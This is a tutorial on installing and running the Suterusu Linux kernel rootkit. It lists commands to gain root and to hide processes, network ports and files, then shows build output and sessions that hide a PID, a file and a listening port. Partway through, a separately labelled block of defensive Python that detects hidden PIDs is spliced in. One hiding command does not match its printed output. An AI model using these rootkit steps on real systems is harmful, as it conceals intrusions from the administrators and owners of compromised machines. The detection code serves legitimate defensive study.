Installing and using the kernel-level rootkit Suterusu

Download address: https://github.com/citypw/suterusu/
An LKM rootkit targeting Linux 2.6/3.x on x86(_64), and ARM
Feature list:

Get root
$ ./sock 0
Hide PID
$ ./sock 1 [pid]
Unhide PID
$ ./sock 2 [pid]
Hide TCPv4 port
$ ./sock 3 [port]
Unhide TCPv4 port
$ ./sock 4 [port]
Hide TCPv6 port
$ ./sock 5 [port]
Unhide TCPv6 port
$ ./sock 6 [port]
Hide UDPv4 port
$ ./sock 7 [port]
Unhide UDPv4 port
$ ./sock 8 [port]
Hide UDPv6 port
$ ./sock 9 [port]
Unhide UDPv6 port
$ ./sock 10 [port]
Hide file/directory
$ ./sock 11 [name]
Unhide file/directory
$ ./sock 12 [name]

Tested on CentOS 6.5 64-bit:
1)

[root@vincent suterusu-master]# make linux-x86_64 KDIR=/lib/modules/$(uname -r)/build // note: the target here is linux-x86_64
make ARCH=x86_64 EXTRA_CFLAGS="-D_CONFIG_X86_64_ " -C /lib/modules/2.6.32-642.1.1.el6.x86_64/build M=/tmp/suterusu-master modules
make[1]: Entering directory `/usr/src/kernels/2.6.32-642.1.1.el6.x86_64'
CC [M] /tmp/suterusu-master/main.o
CC [M] /tmp/suterusu-master/util.o
CC [M] /tmp/suterusu-master/module.o
LD [M] /tmp/suterusu-master/suterusu.o
Building modules, stage 2.
MODPOST 1 modules
CC /tmp/suterusu-master/suterusu.mod.o
LD [M] /tmp/suterusu-master/suterusu.ko.unsigned
NO SIGN [M] /tmp/suterusu-master/suterusu.ko
make[1]: Leaving directory `/usr/src/kernels/2.6.32-642.1.1.el6.x86_64'

2)

[root@vincent suterusu-master]# gcc sock.c -o sock
sock.c: 在函数‘main’中:
sock.c:205: 警告:隐式声明与内建函数‘strlen’不兼容
sock.c:220: 警告:隐式声明与内建函数‘strlen’不兼容

3)

[root@vincent suterusu-master]# insmod suterusu.ko

Hiding a process:

[root@vincent suterusu-master]# ./sock 1 5542
Hiding PID 5542
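A defender-side check for the PID hiding shown above. This is an added example, not code from this post or from the Suterusu project; it assumes the rootkit filters only the directory listing of /proc (readdir) and leaves /proc/<pid> reachable by a direct path lookup, so a brute-force probe of every PID up to pid_max reveals what the listing omits (the usual cross-view technique).

```python
# Added example (not from the post or the Suterusu project): cross-view
# detection of PIDs hidden from /proc listings. Assumes the rootkit filters
# only readdir() results for /proc, as Suterusu's "hide PID" does, and that
# /proc/<pid> remains reachable by a direct path lookup.
import os

DEFAULT_PID_MAX = 32768  # fallback when /proc/sys/kernel/pid_max is unreadable


def read_pid_max(proc="/proc"):
    try:
        with open(os.path.join(proc, "sys/kernel/pid_max")) as f:
            return int(f.read())
    except (OSError, ValueError):
        return DEFAULT_PID_MAX


def list_proc_pids(proc="/proc"):
    """PIDs as the (possibly hooked) directory listing reports them."""
    return {int(name) for name in os.listdir(proc) if name.isdigit()}


def probe_proc_pids(proc="/proc", max_pid=None):
    """PIDs found by looking up /proc/<n> directly, bypassing readdir."""
    max_pid = max_pid or read_pid_max(proc)
    return {pid for pid in range(1, max_pid + 1)
            if os.path.isdir(os.path.join(proc, str(pid)))}


def cross_view_diff(listed, probed):
    """PIDs reachable by path but absent from the listing: the suspects."""
    return sorted(set(probed) - set(listed))


def find_hidden_pids(proc="/proc", max_pid=None):
    """Suspects confirmed by a second look, which drops processes that
    merely started or exited between the two views."""
    suspects = cross_view_diff(list_proc_pids(proc), probe_proc_pids(proc, max_pid))
    relisted = list_proc_pids(proc)
    return [pid for pid in suspects
            if pid not in relisted and os.path.isdir(os.path.join(proc, str(pid)))]


if __name__ == "__main__":
    for pid in find_hidden_pids():
        print(f"PID {pid} exists under /proc but is missing from its listing")
```

Run it as root on the host after the insmod step to confirm that the hidden PID reappears; a large pid_max makes the probe take a few seconds, so pass a smaller max_pid when you only care about the low range.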

Hiding a file:
Note that file hiding matches on the file name only: if you hide a file named x, every file named x in every directory is hidden.

[root@vincent suterusu-master]# ./sock 11image.php
Hiding file/dir ../image.php

Hiding a connection:

[root@vincent suterusu-master]# netstat -ano | grep 49745
tcp 0 0 0.0.0.0:49745 0.0.0.0:* LISTEN off (0.00/0/0)
[root@vincent suterusu-master]# ./sock 3 49745
Hiding TCPv4 port 49745
[root@vincent suterusu-master]# netstat -ano | grep 49745
[root@vincent suterusu-master]#